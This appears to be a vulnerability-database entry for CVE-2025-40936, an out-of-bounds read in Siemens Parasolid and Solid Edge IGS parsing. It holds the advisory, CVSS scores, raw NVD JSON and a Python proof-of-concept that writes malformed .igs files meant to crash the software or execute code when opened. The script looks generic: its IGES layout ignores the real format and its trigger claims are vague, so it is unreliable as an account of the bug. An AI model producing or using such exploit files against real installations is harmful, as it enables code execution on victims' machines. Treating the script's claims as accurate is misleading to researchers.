Security Vulnerability Report
中文
CVE-2025-40936 CVSS 7.8 HIGH

CVE-2025-40936

Published: 2025-11-17 12:15:44
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V29.0.258), Solid Edge (All versions < V226.00 Update 03). The affected applications contains an out of bounds read vulnerability while parsing specially crafted IGS files. This could allow an attacker to crash the application or execute code in the context of the current process. (ZDI-CAN-26755)

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PS/IGES Parasolid Translator Component < V29.0.258
Solid Edge < V226.00 Update 03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-40936 PoC - Malicious IGS File Generator Siemens Parasolid/Solid Edge IGS Parsing Out-of-Bounds Read This PoC generates a malformed IGS file that triggers an out-of-bounds read vulnerability in affected versions of Siemens Parasolid Translator Component and Solid Edge. DISCLAIMER: This code is for educational and security research purposes only. Unauthorized use against systems you do not own or have permission to test is illegal. Use responsibly. """ import struct import os def generate_malformed_igs(): """ Generate a malformed IGS file to trigger out-of-bounds read. The vulnerability exists in IGS file parsing where boundary checks are insufficient when processing entity data. """ # IGS Header Section header = """SGRDMFRSASCIIFILEFORIGESFORMAT 1.,1.,2H,1H,,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H """ # Directory Entry Section - Malformed entity data # Craft entries with oversized parameter data to trigger OOB read directory_entries = """ 128 1 1 0 0 0 0 000000000D 1 128 0 1 0 0 0 0 000000000D 1 """ # Parameter Section - Malformed data # The vulnerability is triggered when parsing these parameters # Using extreme values and malformed coordinate data params = """ 128,1,9999999999.0,9999999999.0,9999999999.0,0.0,0.0,0.0,9999999999.0,9999999999.0,9999999999.0 128,2,9999999999.0,9999999999.0,9999999999.0,0.0,0.0,0.0,9999999999.0,9999999999.0,9999999999.0 """ # Malformed coordinate data designed to trigger boundary issues # in the IGS parser malformed_data = """ 9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999 9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999 """ # IGS Terminator Section terminator = """S 1T 1 """ # Combine all sections igs_content = header + directory_entries + params + malformed_data + terminator return igs_content def generate_igs_with_buffer_overflow(): """ Alternative PoC: Generate IGS with buffer overflow conditions targeting the entity parsing logic. """ # Create a minimal IGS file with malformed entity structure igs_content = """MALFORGEDIGESFILEFORCVE202540936 1.,1.,2H,1H,,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H """ # Add many malformed entity directory entries for i in range(1000): igs_content += f"{128+i:7d} 1 1 0 0 0 0 000000000D 1\n" igs_content += f"{128+i:7d} 0 1 0 0 0 0 000000000D 1\n" # Malformed parameters with oversized values for i in range(1000): igs_content += f"128,{i}," + ",".join(["9999999999.0"] * 50) + "\n" igs_content += "S 1T 1\n" return igs_content def main(): """Generate and save PoC IGS files""" print("[*] Generating CVE-2025-40936 PoC IGS files...") print("[*] Target: Siemens Parasolid Translator Component < V29.0.258") print("[*] Target: Siemens Solid Edge < V226.00 Update 03") print() # Generate basic PoC poc_igs = generate_malformed_igs() with open("CVE-2025-40936_poc.igs", "w") as f: f.write(poc_igs) print("[+] Generated: CVE-2025-40936_poc.igs") # Generate aggressive PoC poc_igs_aggressive = generate_igs_with_buffer_overflow() with open("CVE-2025-40936_poc_aggressive.igs", "w") as f: f.write(poc_igs_aggressive) print("[+] Generated: CVE-2025-40936_poc_aggressive.igs") print() print("[*] Usage: Open the generated .igs file with affected Siemens software") print("[*] Expected result: Application crash or potential code execution") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40936", "sourceIdentifier": "[email protected]", "published": "2025-11-17T12:15:44.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V29.0.258), Solid Edge (All versions < V226.00 Update 03). The affected applications contains an out of bounds read vulnerability while parsing specially crafted IGS files. This could allow an attacker to crash the application or execute code in the context of the current process. (ZDI-CAN-26755)"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-241605.html", "source": "[email protected]"}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-445819.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.